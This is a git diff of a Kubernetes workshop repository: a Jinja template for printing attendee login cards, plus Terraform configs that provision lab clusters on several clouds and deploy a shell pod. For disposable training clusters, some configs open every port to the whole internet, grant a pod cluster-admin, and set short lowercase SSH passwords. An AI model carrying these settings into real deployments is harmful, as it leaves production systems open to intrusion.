var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for login in logins %}
<div class="card front">
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
{% if img_logo_src %}
<img class="logo" src="{{ img_logo_src }}" />
{% endif %}
<table>
<tr>
<td>login:</td>
<td>password:</td>
</tr>
<tr>
<td class="logpass">{{ login.login }}</td>
<td class="logpass">{{ login.password }}</td>
</tr>
<tr>
<td>IP address:</td>
{% if login.port %}
<td>port:</td>
{% endif %}
</tr>
<tr>
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
{% if login.port %}
<td class="logpass">{{ login.port }}</td>
{% endif %}
</tr>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">{{ user_login }}</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
{% if img_bottom_src %}
<img class="bottom" src="{{ img_bottom_src }}" />
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="card back">
{{ backside }}
{#
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% for x in range(pagesize) %}
<div class="back">
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
#}
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>

View File

@@ -1,19 +0,0 @@
cards_template: cards.html
paper_size: Letter
url: https://2024-11-qconsf.container.training
event: workshop
backside: |
<div class="qrcode"></div>
<p>
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
</p>
<p>
<b>This QR code will give you my contact info</b> as well as a link to a feedback form.
</p>
<p>
If you liked this workshop, I can train your team, in person or online, with custom
courses of any length and any level, on Docker, Kubernetes, and MLops.
</p>
qrcode: https://2024-11-qconsf.container.training/#contact
thing: Kubernetes cluster
image: logo-kubernetes.png

View File

@@ -1,2 +0,0 @@
#!/bin/sh
exo zone

View File

@@ -8,8 +8,8 @@ resource "random_string" "_" {
resource "time_static" "_" {}
locals {
min_nodes_per_pool = var.min_nodes_per_cluster
max_nodes_per_pool = var.max_nodes_per_cluster
min_nodes_per_pool = var.nodes_per_cluster
max_nodes_per_pool = var.nodes_per_cluster * 2
timestamp = formatdate("YYYY-MM-DD-hh-mm", time_static._.rfc3339)
tag = random_string._.result
# Common tags to be assigned to all resources

View File

@@ -2,11 +2,7 @@ terraform {
required_providers {
kubernetes = {
source = "hashicorp/kubernetes"
version = "~> 2.38.0"
}
helm = {
source = "hashicorp/helm"
version = "~> 3.0"
version = "2.16.1"
}
}
}
@@ -18,20 +14,6 @@ provider "kubernetes" {
config_path = "./kubeconfig.${index}"
}
provider "helm" {
alias = "cluster_${index}"
kubernetes = {
config_path = "./kubeconfig.${index}"
}
}
# Password used for SSH and code-server access
resource "random_string" "shpod_${index}" {
length = 6
special = false
upper = false
}
resource "kubernetes_namespace" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
@@ -39,53 +21,121 @@ resource "kubernetes_namespace" "shpod_${index}" {
}
}
data "kubernetes_service" "shpod_${index}" {
depends_on = [ helm_release.shpod_${index} ]
resource "kubernetes_deployment" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
namespace = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
spec {
selector {
match_labels = {
app = "shpod"
}
}
template {
metadata {
labels = {
app = "shpod"
}
}
spec {
service_account_name = "shpod"
container {
image = "jpetazzo/shpod"
name = "shpod"
env {
name = "PASSWORD"
value = random_string.shpod_${index}.result
}
lifecycle {
post_start {
exec {
command = [ "sh", "-c", "curl http://myip.enix.org/REMOTE_ADDR > /etc/HOSTIP || true" ]
}
}
}
resources {
limits = {
cpu = "2"
memory = "500M"
}
requests = {
cpu = "100m"
memory = "250M"
}
}
}
}
}
}
}
resource "helm_release" "shpod_${index}" {
provider = helm.cluster_${index}
repository = "https://shpod.in"
chart = "shpod"
name = "shpod"
namespace = "shpod"
create_namespace = false
values = [
yamlencode({
service = {
type = "NodePort"
}
resources = {
requests = {
cpu = "100m"
memory = "500M"
}
limits = {
cpu = "1"
memory = "1000M"
}
}
persistentVolume = {
enabled = true
}
ssh = {
password = random_string.shpod_${index}.result
}
rbac = {
cluster = {
clusterRoles = [ "cluster-admin" ]
}
}
codeServer = {
enabled = true
}
})
]
resource "kubernetes_service" "shpod_${index}" {
provider = kubernetes.cluster_${index}
lifecycle {
# Folks might alter their shpod Service to expose extra ports.
# Don't reset their changes.
ignore_changes = [ spec ]
}
metadata {
name = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
spec {
selector = {
app = "shpod"
}
port {
name = "ssh"
port = 22
target_port = 22
}
type = "NodePort"
}
}
resource "kubernetes_service_account" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
}
resource "kubernetes_cluster_role_binding" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
}
role_ref {
api_group = "rbac.authorization.k8s.io"
kind = "ClusterRole"
name = "cluster-admin"
}
subject {
kind = "ServiceAccount"
name = "shpod"
namespace = "shpod"
}
subject {
api_group = "rbac.authorization.k8s.io"
kind = "Group"
name = "shpod-cluster-admins"
}
}
resource "random_string" "shpod_${index}" {
length = 6
special = false
upper = false
}
provider "helm" {
alias = "cluster_${index}"
kubernetes {
config_path = "./kubeconfig.${index}"
}
}
resource "helm_release" "metrics_server_${index}" {
@@ -100,75 +150,13 @@ resource "helm_release" "metrics_server_${index}" {
name = "metrics-server"
namespace = "metrics-server"
create_namespace = true
values = [
yamlencode({
args = [ "--kubelet-insecure-tls" ]
})
]
}
# As of October 2025, the ebs-csi-driver addon (which is used on EKS
# to provision persistent volumes) doesn't automatically create a
# StorageClass. Here, we're trying to detect the DaemonSet created
# by the ebs-csi-driver; and if we find it, we create the corresponding
# StorageClass.
data "kubernetes_resources" "ebs_csi_node_${index}" {
provider = kubernetes.cluster_${index}
api_version = "apps/v1"
kind = "DaemonSet"
label_selector = "app.kubernetes.io/name=aws-ebs-csi-driver"
namespace = "kube-system"
}
resource "kubernetes_storage_class" "ebs_csi_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 1 : 0
provider = kubernetes.cluster_${index}
metadata {
name = "ebs-csi"
annotations = {
"storageclass.kubernetes.io/is-default-class" = "true"
}
set {
name = "args"
value = "{--kubelet-insecure-tls}"
}
storage_provisioner = "ebs.csi.aws.com"
}
# This section here deserves a little explanation.
#
# When we access a cluster with shpod (either through SSH or code-server)
# there is no kubeconfig file - we simply use "in-cluster" authentication
# with a ServiceAccount token. This is a bit unusual, and ideally, I would
# prefer to have a "normal" kubeconfig file in the students' shell.
#
# So what we're doing here, is that we're populating a ConfigMap with
# a kubeconfig file; and in the initialization scripts (e.g. bashrc) we
# automatically download the kubeconfig file from the ConfigMap and place
# it in ~/.kube/kubeconfig.
#
# But, which kubeconfig file should we use? We could use the "normal"
# kubeconfig file that was generated by the provider; but in some cases,
# that kubeconfig file might use a token instead of a certificate for
# user authentication - and ideally, I would like to have a certificate
# so that in the section about auth and RBAC, we can dissect that TLS
# certificate and explain where our permissions come from.
#
# So we're creating a TLS key pair; using the CSR API to issue a user
# certificate belongong to a special group; and grant the cluster-admin
# role to that group; then we use the kubeconfig file generated by the
# provider but override the user with that TLS key pair.
#
# This is not strictly necessary but it streamlines the lesson on auth.
#
# Lastly - in the ConfigMap we actually put both the original kubeconfig,
# and the one where we injected our new user (just in case we want to
# use or look at the original for any reason).
#
# One more thing: the kubernetes.io/kube-apiserver-client signer is
# disabled on EKS, so... we don't generate that ConfigMap on EKS.
# To detect if we're on EKS, we're looking for the ebs-csi-node DaemonSet.
# (Which means that the detection will break if the ebs-csi addon is missing.)
resource "kubernetes_config_map" "kubeconfig_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 0 : 1
provider = kubernetes.cluster_${index}
metadata {
name = "kubeconfig"
@@ -194,7 +182,7 @@ resource "kubernetes_config_map" "kubeconfig_${index}" {
- name: cluster-admin
user:
client-key-data: $${base64encode(tls_private_key.cluster_admin_${index}.private_key_pem)}
client-certificate-data: $${base64encode(kubernetes_certificate_signing_request_v1.cluster_admin_${index}[0].certificate)}
client-certificate-data: $${base64encode(kubernetes_certificate_signing_request_v1.cluster_admin_${index}.certificate)}
EOT
}
}
@@ -214,25 +202,7 @@ resource "tls_cert_request" "cluster_admin_${index}" {
}
}
resource "kubernetes_cluster_role_binding" "shpod_cluster_admin_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod-cluster-admin"
}
role_ref {
api_group = "rbac.authorization.k8s.io"
kind = "ClusterRole"
name = "cluster-admin"
}
subject {
api_group = "rbac.authorization.k8s.io"
kind = "Group"
name = "shpod-cluster-admins"
}
}
resource "kubernetes_certificate_signing_request_v1" "cluster_admin_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 0 : 1
provider = kubernetes.cluster_${index}
metadata {
name = "cluster-admin"
@@ -247,28 +217,16 @@ resource "kubernetes_certificate_signing_request_v1" "cluster_admin_${index}" {
%{ endfor ~}
output "ips_txt" {
output "ip_addresses_of_nodes" {
value = join("\n", [
%{ for index, cluster in clusters ~}
join("\n", concat(
join("\t", concat(
[
random_string.shpod_${index}.result,
"ssh -l k8s -p $${kubernetes_service.shpod_${index}.spec[0].port[0].node_port}"
],
split(" ", file("./externalips.${index}"))
)),
%{ endfor ~}
""
])
}
output "logins_jsonl" {
value = join("\n", [
%{ for index, cluster in clusters ~}
jsonencode({
login = "k8s",
password = random_string.shpod_${index}.result,
port = data.kubernetes_service.shpod_${index}.spec[0].port[0].node_port,
codeServerPort = data.kubernetes_service.shpod_${index}.spec[0].port[1].node_port,
ipaddrs = replace(file("./externalips.${index}"), " ", "\t"),
}),
%{ endfor ~}
""
])
}

View File

@@ -7,23 +7,18 @@ variable "how_many_clusters" {
default = 2
}
variable "min_nodes_per_cluster" {
variable "nodes_per_cluster" {
type = number
default = 2
}
variable "max_nodes_per_cluster" {
type = number
default = 4
}
variable "node_size" {
type = string
default = "M"
}
variable "location" {
type = string
type = string
default = null
}

View File

@@ -1,45 +1,60 @@
data "aws_eks_cluster_versions" "_" {
default_only = true
# Taken from:
# https://github.com/hashicorp/learn-terraform-provision-eks-cluster/blob/main/main.tf
data "aws_availability_zones" "available" {}
module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "3.19.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
public_subnets = ["10.0.4.0/24", "10.0.5.0/24", "10.0.6.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "~> 21.0"
name = var.cluster_name
kubernetes_version = data.aws_eks_cluster_versions._.cluster_versions[0].cluster_version
vpc_id = local.vpc_id
subnet_ids = local.subnet_ids
endpoint_public_access = true
enable_cluster_creator_admin_permissions = true
upgrade_policy = {
# The default policy is EXTENDED, which incurs additional costs
# when running an old control plane. We don't advise to run old
# control planes, but we also don't want to incur costs if an
# old version is chosen accidentally.
support_type = "STANDARD"
}
source = "terraform-aws-modules/eks/aws"
version = "19.5.1"
cluster_name = var.cluster_name
cluster_version = "1.24"
vpc_id = module.vpc.vpc_id
subnet_ids = module.vpc.private_subnets
cluster_endpoint_public_access = true
eks_managed_node_group_defaults = {
ami_type = "AL2_x86_64"
addons = {
coredns = {}
eks-pod-identity-agent = {
before_compute = true
}
kube-proxy = {}
vpc-cni = {
before_compute = true
}
aws-ebs-csi-driver = {
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
}
}
eks_managed_node_groups = {
x86 = {
name = "x86"
one = {
name = "node-group-one"
instance_types = [local.node_size]
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
}
}
}
@@ -51,7 +66,7 @@ data "aws_iam_policy" "ebs_csi_policy" {
module "irsa-ebs-csi" {
source = "terraform-aws-modules/iam/aws//modules/iam-assumable-role-with-oidc"
version = "~> 5.39.0"
version = "4.7.0"
create_role = true
role_name = "AmazonEKSTFEBSCSIRole-${module.eks.cluster_name}"
@@ -60,9 +75,13 @@ module "irsa-ebs-csi" {
oidc_fully_qualified_subjects = ["system:serviceaccount:kube-system:ebs-csi-controller-sa"]
}
resource "aws_vpc_security_group_ingress_rule" "_" {
security_group_id = module.eks.node_security_group_id
cidr_ipv4 = "0.0.0.0/0"
ip_protocol = -1
description = "Allow all traffic to Kubernetes nodes (so that we can use NodePorts, hostPorts, etc.)"
resource "aws_eks_addon" "ebs-csi" {
cluster_name = module.eks.cluster_name
addon_name = "aws-ebs-csi-driver"
addon_version = "v1.5.2-eksbuild.1"
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
tags = {
"eks_addon" = "ebs-csi"
"terraform" = "true"
}
}

View File

@@ -1,8 +1,7 @@
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 6.17.0"
source = "hashicorp/aws"
}
}
}

View File

@@ -1,61 +0,0 @@
# OK, we have two options here.
# 1. Create our own VPC
# - Pros: provides good isolation from other stuff deployed in the
# AWS account; makes sure that we don't interact with
# existing security groups, subnets, etc.
# - Cons: by default, there is a quota of 5 VPC per region, so
# we can only deploy 5 clusters
# 2. Use the default VPC
# - Pros/cons: the opposite :)
variable "use_default_vpc" {
type = bool
default = true
}
data "aws_vpc" "default" {
default = true
}
data "aws_subnets" "default" {
filter {
name = "vpc-id"
values = [data.aws_vpc.default.id]
}
}
data "aws_availability_zones" "available" {}
module "vpc" {
count = var.use_default_vpc ? 0 : 1
source = "terraform-aws-modules/vpc/aws"
version = "~> 6.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.11.0/24", "10.0.12.0/24", "10.0.13.0/24"]
public_subnets = ["10.0.21.0/24", "10.0.22.0/24", "10.0.23.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
map_public_ip_on_launch = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
locals {
vpc_id = var.use_default_vpc ? data.aws_vpc.default.id : module.vpc[0].vpc_id
subnet_ids = var.use_default_vpc ? data.aws_subnets.default.ids : module.vpc[0].public_subnets
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/azure/config.tf

View File

@@ -1,22 +0,0 @@
resource "azurerm_resource_group" "_" {
name = var.cluster_name
location = var.location
}
resource "azurerm_kubernetes_cluster" "_" {
name = var.cluster_name
location = var.location
dns_prefix = var.cluster_name
identity {
type = "SystemAssigned"
}
resource_group_name = azurerm_resource_group._.name
default_node_pool {
name = "x86"
node_count = var.min_nodes_per_pool
min_count = var.min_nodes_per_pool
max_count = var.max_nodes_per_pool
vm_size = local.node_size
enable_auto_scaling = true
}
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = azurerm_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = azurerm_kubernetes_cluster._.kube_config_raw
sensitive = true
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/azure/variables.tf

View File

@@ -0,0 +1,12 @@
locals {
location = var.location != null ? var.location : "europe-north1-a"
region = replace(local.location, "/-[a-z]$/", "")
# Unfortunately, the following line doesn't work
# (that attribute just returns an empty string)
# so we have to hard-code the project name.
#project = data.google_client_config._.project
project = "prepare-tf"
}
data "google_client_config" "_" {}

View File

@@ -1,7 +1,7 @@
resource "google_container_cluster" "_" {
name = var.cluster_name
location = local.location
deletion_protection = false
name = var.cluster_name
project = local.project
location = local.location
#min_master_version = var.k8s_version
# To deploy private clusters, uncomment the section below,
@@ -42,7 +42,7 @@ resource "google_container_cluster" "_" {
node_pool {
name = "x86"
node_config {
tags = ["lab-${var.cluster_name}"]
tags = var.common_tags
machine_type = local.node_size
}
initial_node_count = var.min_nodes_per_pool
@@ -62,25 +62,3 @@ resource "google_container_cluster" "_" {
}
}
}
resource "google_compute_firewall" "_" {
name = "lab-${var.cluster_name}"
network = "default"
allow {
protocol = "tcp"
ports = ["0-65535"]
}
allow {
protocol = "udp"
ports = ["0-65535"]
}
allow {
protocol = "icmp"
}
source_ranges = ["0.0.0.0/0"]
target_tags = ["lab-${var.cluster_name}"]
}

View File

@@ -6,8 +6,6 @@ output "has_metrics_server" {
value = true
}
data "google_client_config" "_" {}
output "kubeconfig" {
sensitive = true
value = <<-EOT

View File

@@ -1 +0,0 @@
../../providers/googlecloud/provider.tf

View File

@@ -0,0 +1,8 @@
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "4.5.0"
}
}
}

View File

@@ -11,23 +11,17 @@ data "oci_containerengine_cluster_option" "_" {
locals {
compartment_id = oci_identity_compartment._.id
kubernetes_version = data.oci_containerengine_cluster_option._.kubernetes_versions[0]
images = [
for image in data.oci_containerengine_node_pool_option._.sources : image
if can(regex("OKE", image.source_name))
&& can(regex(substr(local.kubernetes_version, 1, -1), image.source_name))
&& !can(regex("GPU", image.source_name))
&& !can(regex("aarch64", image.source_name))
]
}
data "oci_identity_availability_domains" "_" {
compartment_id = local.compartment_id
}
data "oci_containerengine_node_pool_option" "_" {
compartment_id = local.compartment_id
node_pool_option_id = oci_containerengine_cluster._.id
data "oci_core_images" "_" {
compartment_id = local.compartment_id
operating_system = "Oracle Linux"
operating_system_version = "8"
shape = local.shape
}
resource "oci_containerengine_cluster" "_" {
@@ -62,7 +56,7 @@ resource "oci_containerengine_node_pool" "_" {
}
}
node_source_details {
image_id = local.images[0].image_id
image_id = data.oci_core_images._.images[0].id
source_type = "image"
}
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/ovh/config.tf

View File

@@ -1,18 +0,0 @@
resource "ovh_cloud_project_kube" "_" {
name = var.cluster_name
region = var.location
version = local.k8s_version
}
resource "ovh_cloud_project_kube_nodepool" "_" {
kube_id = ovh_cloud_project_kube._.id
name = "x86"
flavor_name = local.node_size
desired_nodes = var.min_nodes_per_pool
min_nodes = var.min_nodes_per_pool
max_nodes = var.max_nodes_per_pool
}
locals {
k8s_version = "1.26"
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = ovh_cloud_project_kube._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = ovh_cloud_project_kube._.kubeconfig
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
ovh = {
source = "ovh/ovh"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/ovh/variables.tf

View File

@@ -1,23 +1,10 @@
resource "scaleway_vpc_private_network" "_" {
}
# This is a kind of hack to use a custom security group with Kapsulse.
# See https://www.scaleway.com/en/docs/containers/kubernetes/reference-content/secure-cluster-with-private-network/
resource "scaleway_instance_security_group" "_" {
name = "kubernetes ${split("/", scaleway_k8s_cluster._.id)[1]}"
inbound_default_policy = "accept"
outbound_default_policy = "accept"
}
resource "scaleway_k8s_cluster" "_" {
name = var.cluster_name
name = var.cluster_name
#region = var.location
tags = var.common_tags
version = local.k8s_version
type = "kapsule"
cni = "cilium"
delete_additional_resources = true
private_network_id = scaleway_vpc_private_network._.id
}
resource "scaleway_k8s_pool" "_" {
@@ -30,7 +17,6 @@ resource "scaleway_k8s_pool" "_" {
max_size = var.max_nodes_per_pool
autoscaling = var.max_nodes_per_pool > var.min_nodes_per_pool
autohealing = true
depends_on = [scaleway_instance_security_group._]
}
data "scaleway_k8s_version" "_" {

View File

@@ -4,36 +4,24 @@ resource "helm_release" "_" {
create_namespace = true
repository = "https://charts.loft.sh"
chart = "vcluster"
version = "0.27.1"
values = [
yamlencode({
controlPlane = {
proxy = {
extraSANs = [ local.guest_api_server_host ]
}
service = {
spec = {
type = "NodePort"
}
}
statefulSet = {
persistence = {
volumeClaim = {
enabled = true
}
}
}
}
sync = {
fromHost = {
nodes = {
enabled = true
selector = {
all = true
}
}
}
}
})
]
set {
name = "service.type"
value = "NodePort"
}
set {
name = "storage.persistence"
value = "false"
}
set {
name = "sync.nodes.enabled"
value = "true"
}
set {
name = "sync.nodes.syncAllNodes"
value = "true"
}
set {
name = "syncer.extraArgs"
value = "{--tls-san=${local.guest_api_server_host}}"
}
}

View File

@@ -44,5 +44,5 @@ locals {
guest_api_server_port = local.node_port
guest_api_server_url_new = "https://${local.guest_api_server_host}:${local.guest_api_server_port}"
guest_api_server_url_old = yamldecode(local.kubeconfig_raw).clusters[0].cluster.server
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
}

View File

@@ -1,8 +0,0 @@
terraform {
required_providers {
helm = {
source = "hashicorp/helm"
version = "~> 3.0"
}
}
}

View File

@@ -1,8 +0,0 @@
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 7.0"
}
}
}

View File

@@ -9,9 +9,5 @@ variable "node_sizes" {
variable "location" {
type = string
default = "europe-north1-a"
default = null
}
locals {
location = (var.location != "" && var.location != null) ? var.location : "europe-north1-a"
}

View File

@@ -14,9 +14,9 @@ $ hcloud server-type list | grep shared
variable "node_sizes" {
type = map(any)
default = {
S = "cpx11"
M = "cpx21"
L = "cpx31"
S = "cx11"
M = "cx21"
L = "cx31"
}
}

View File

@@ -1,13 +0,0 @@
variable "node_sizes" {
type = map(any)
default = {
S = "d2-4"
M = "d2-4"
L = "d2-8"
}
}
variable "location" {
type = string
default = "BHS5"
}

View File

@@ -1,30 +0,0 @@
variable "proxmox_endpoint" {
type = string
default = "https://localhost:8006/"
}
variable "proxmox_username" {
type = string
default = null
}
variable "proxmox_password" {
type = string
default = null
}
variable "proxmox_storage" {
type = string
default = "local"
}
variable "proxmox_template_node_name" {
type = string
default = null
}
variable "proxmox_template_vm_id" {
type = number
default = null
}

View File

@@ -1,11 +0,0 @@
# Since node size needs to be a string...
# To indicate number of CPUs + RAM, just pass it as a string with a space between them.
# RAM is in megabytes.
variable "node_sizes" {
type = map(any)
default = {
S = "1 2048"
M = "2 4096"
L = "3 8192"
}
}

View File

@@ -1,5 +1,5 @@
provider "helm" {
kubernetes = {
kubernetes {
config_path = "~/kubeconfig"
}
}

View File

@@ -1,5 +1,5 @@
variable "node_sizes" {
type = map(any)
type = map(any)
default = {}
}

View File

@@ -56,7 +56,6 @@ locals {
cluster_name = format("%s-%03d", var.tag, cn[0])
node_name = format("%s-%03d-%03d", var.tag, cn[0], cn[1])
node_size = lookup(var.node_sizes, var.node_size, var.node_size)
node_index = cn[0] * var.nodes_per_cluster + cn[1]
}
}
}
@@ -72,10 +71,10 @@ resource "local_file" "ip_addresses" {
resource "local_file" "clusters" {
content = join("", formatlist("%s\n", [
for cid in range(1, 1 + var.how_many_clusters) :
join("\t",
join(" ",
[for nid in range(1, 1 + var.nodes_per_cluster) :
local.ip_addresses[format("c%03dn%03d", cid, nid)]
])]))
filename = "clusters.tsv"
filename = "clusters.txt"
file_permission = "0600"
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/googlecloud/config.tf

View File

@@ -1,54 +0,0 @@
# Note: names and tags on GCP have to match a specific regex:
# (?:[a-z](?:[-a-z0-9]{0,61}[a-z0-9])?)
# In other words, they must start with a letter; and generally,
# we make them start with a number (year-month-day-etc, so 2025-...)
# so we prefix names and tags with "lab-" in this configuration.
resource "google_compute_instance" "_" {
for_each = local.nodes
zone = var.location
name = "lab-${each.value.node_name}"
tags = ["lab-${var.tag}"]
machine_type = each.value.node_size
boot_disk {
initialize_params {
image = "ubuntu-os-cloud/ubuntu-2404-lts-amd64"
}
}
network_interface {
network = "default"
access_config {}
}
metadata = {
"ssh-keys" = "ubuntu:${tls_private_key.ssh.public_key_openssh}"
}
}
locals {
ip_addresses = {
for key, value in local.nodes :
key => google_compute_instance._[key].network_interface[0].access_config[0].nat_ip
}
}
resource "google_compute_firewall" "_" {
name = "lab-${var.tag}"
network = "default"
allow {
protocol = "tcp"
ports = ["0-65535"]
}
allow {
protocol = "udp"
ports = ["0-65535"]
}
allow {
protocol = "icmp"
}
source_ranges = ["0.0.0.0/0"]
target_tags = ["lab-${var.tag}"]
}

View File

@@ -1 +0,0 @@
../../providers/googlecloud/provider.tf

View File

@@ -1 +0,0 @@
../../providers/googlecloud/variables.tf

View File

@@ -1,22 +1,14 @@
resource "openstack_compute_instance_v2" "_" {
for_each = local.nodes
name = each.value.node_name
image_name = data.openstack_images_image_v2._.name
image_name = var.image
flavor_name = each.value.node_size
key_pair = openstack_compute_keypair_v2._.name
key_pair = openstack_compute_keypair_v2._.name
network {
port = openstack_networking_port_v2._[each.key].id
}
}
data "openstack_images_image_v2" "_" {
most_recent = true
properties = {
os = "ubuntu"
version = "24.04"
}
}
resource "openstack_networking_port_v2" "_" {
for_each = local.nodes
network_id = openstack_networking_network_v2._.id

View File

@@ -31,6 +31,10 @@ variable "external_network_id" {
type = string
}
variable "image" {
type = string
}
variable "node_sizes" {
type = map(any)
default = {}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/proxmox/config.tf

Some files were not shown because too many files have changed in this diff Show More